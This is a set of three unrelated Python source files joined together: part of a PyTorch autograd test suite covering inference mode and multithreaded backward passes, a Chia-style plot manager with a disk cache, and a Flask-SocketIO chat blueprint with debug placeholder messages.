self.assertTrue(torch.is_inference(tmp))
tmp = torch.ones(1, 2, 3).requires_grad_(False)
self.assertFalse(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a non-view operation produces a inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing inplace operation, tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# perform view operation produces inference tensor
# that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# leaf variable that requires grad is being used in an inplace
# operation when requires_grad=True
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
# tensor argument. So there isn't a mixed inference and normal
# tensor inputs for view ops
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
# this is fine since its equivalent as s.view(c.sizes()) which
# isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
threads = []
for _ in range(num_threads):
p = threading.Thread(target=fn, args=(args))
p.start()
threads.append(p)
for p in threads:
p.join()
def test_simple_backward(self):
# simple multithreaded backward that create threads in the beginning of training
# and everything else is training separately, i.e. inputs, operations, etc.
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (i.e. This is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we are calling backward from multiple threads
# and all threads share the same input, when we do backward
# concurrently, different backwards will all accumulate to
# the same .grad for each input, and the gradients should
# be equal to num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
# since we use functional grad() api, gradients will not
# be accumulate to the same place and should be the same
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_python_thread_in_middle(self):
# User might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is being shared across
# different threads and we need to ensure user specify retain_graph=True, otherwise
# error out with the correct error message
# Case 1: multiple backward with python threads, retain_graph=False
# should throw error in some threads with no retain_graph.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
# at least one thread will be success in this case, all other threads should raise
# with the error that throw to user to recommend them specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
# result should equal to num_thread * gradients
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
if __name__ == '__main__':
run_tests()
|
manager.py | from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from chia.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from chia.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
)
from chia.util.generator_tools import list_to_batches
from chia.util.ints import uint16
from chia.util.path import mkdir
from chia.util.streamable import Streamable, streamable
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.wallet.derive_keys import master_sk_to_local_sk
from chia.wallet.derive_chives_keys import master_sk_to_chives_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def reset(self):
with self:
self.last_refresh_time = time.time()
self.plots.clear()
self.plot_filename_paths.clear()
self.failed_to_open_filenames.clear()
self.no_key_filenames.clear()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
try:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
# First drop all plots we have in plot_filename_paths but not longer in the filesystem or set in config
for path in list(self.failed_to_open_filenames.keys()):
if path not in plot_paths:
del self.failed_to_open_filenames[path]
for path in self.no_key_filenames.copy():
if path not in plot_paths:
self.no_key_filenames.remove(path)
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if loaded_plot not in plot_paths:
filenames_to_remove.append(plot_filename)
with self:
if loaded_plot in self.plots:
del self.plots[loaded_plot]
total_result.removed.append(loaded_plot)
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
loaded_plot = Path(path) / Path(plot_filename)
if loaded_plot not in plot_paths:
paths_to_remove.append(path)
total_result.removed.append(loaded_plot)
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
for remaining, batch in list_to_batches(plot_paths, self.refresh_parameter.batch_size):
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
# Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {len(total_result.loaded)}, "
f"total_result.removed {len(total_result.removed)}, "
f"total_duration {total_result.duration:.2f} seconds"
)
except Exception as e:
log.error(f"_refresh_callback raised: {e} with the traceback: {traceback.format_exc()}")
self.reset()
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
if not file_path.exists():
return None
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
# Only use plots that correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
# If a plot is in `no_key_filenames` the keys were missing in earlier refresh cycles. We can remove
# the current plot from that list if its in there since we passed the key checks above.
if file_path in self.no_key_filenames:
self.no_key_filenames.remove(file_path)
if prover.get_size()<32:
local_sk = master_sk_to_chives_local_sk(local_master_sk)
else:
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
)
with counter_lock:
result.loaded.append(new_plot_info)
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {len(result.loaded)}, "
f"removed {len(result.removed)}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
chat.py | # -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li <withlihui@gmail.com>
:license: MIT, see LICENSE for more details.
"""
from flask import render_template, redirect, url_for, request, Blueprint, current_app, abort,flash
from flask_login import current_user, login_required
from flask_socketio import emit
import socket,binascii,threading
from catchat.extensions import socketio, db
from catchat.forms import ProfileForm
from catchat.models import Message, User
from catchat.utils import to_html, flash_errors
chat_bp = Blueprint('chat', __name__)
chat_bp.debug = True
online_users = []
# 服务端接收消息并且广播消息
@socketio.on('new message')
def new_message(message_body):
# 将HTML传过来的格式数据包转为Python格式
# html_message = to_html(message_body)
html_message = '测试数据'
# 将数据包存储在数据库
print(current_user)
message = Message(author=current_user._get_current_object(), body=html_message)
db.session.add(message)
db.session.commit()
# 发送数据包,message作为参数传入
emit('new message',
{'message_html': render_template('chat/_message.html', message=message),
'message_body': html_message,
'gravatar': current_user.gravatar,
'nickname': current_user.nickname,
'user_id': current_user.id},
broadcast=True)
# 推送函数
def test():
for i in range(10):
data = '服务端发来的测试数据'
message = Message(author=current_user._get_current_object(), body=data)
emit('new message',
{'message_html': render_template('chat/_message.html', message=message),
'message_body': data,
'gravatar': current_user.gravatar,
'nickname': current_user.nickname,
'user_id': current_user.id
},
broadcast=True)
# 希望点击promote按钮后,服务端会推送10包数据到客户端,为了防止卡顿加了个线程
@chat_bp.route('/promote')
def promote():
t = threading.Thread(target=test)
t.setDaemon(True)
t.start()
amount = current_app.config['CATCHAT_MESSAGE_PER_PAGE']
messages = Message.query.order_by(Message.timestamp.asc())[-amount:]
user_amount = User.query.count()
return render_template('chat/home.html', messages=messages, user_amount=user_amount)
@socketio.on('connect')
def connect():
global online_users
if current_user.is_authenticated and current_user.id not in online_users:
online_users.append(current_user.id)
emit('user count', {'count': len(online_users)}, broadcast=True)
@socketio.on('disconnect')
def disconnect():
global online_users
if current_user.is_authenticated and current_user.id in online_users:
online_users.remove(current_user.id)
emit('user count', {'count': len(online_users)}, broadcast=True)
@chat_bp.route('/')
def home():
amount = current_app.config['CATCHAT_MESSAGE_PER_PAGE']
messages = Message.query.order_by(Message.timestamp.asc())[-amount:]
user_amount = User.query.count()
return render_template('chat/home.html', messages=messages, user_amount=user_amount)
@chat_bp.route('/messages')
def get_messages():
page = request.args.get('page', 1, type=int)
pagination = Message.query.order_by(Message.timestamp.desc()).paginate(
page, per_page=current_app.config['CATCHAT_MESSAGE_PER_PAGE'])
messages = pagination.items
return render_template('chat/_messages.html', messages=messages[::-1])
@chat_bp.route('/profile', methods=['GET', 'POST'])
@login_required
def profile():
form = ProfileForm()
if form.validate_on_submit():
current_user.nickname = form.nickname.data
current_user.github = form.github.data
current_user.website = form.website.data
current_user.bio = form.bio.data
db.session.commit()
return redirect(url_for('.home'))
flash_errors(form)
return render_template('chat/profile.html', form=form)
@chat_bp.route('/profile/<user_id>')
def get_profile(user_id):
user = User.query.get_or_404(user_id)
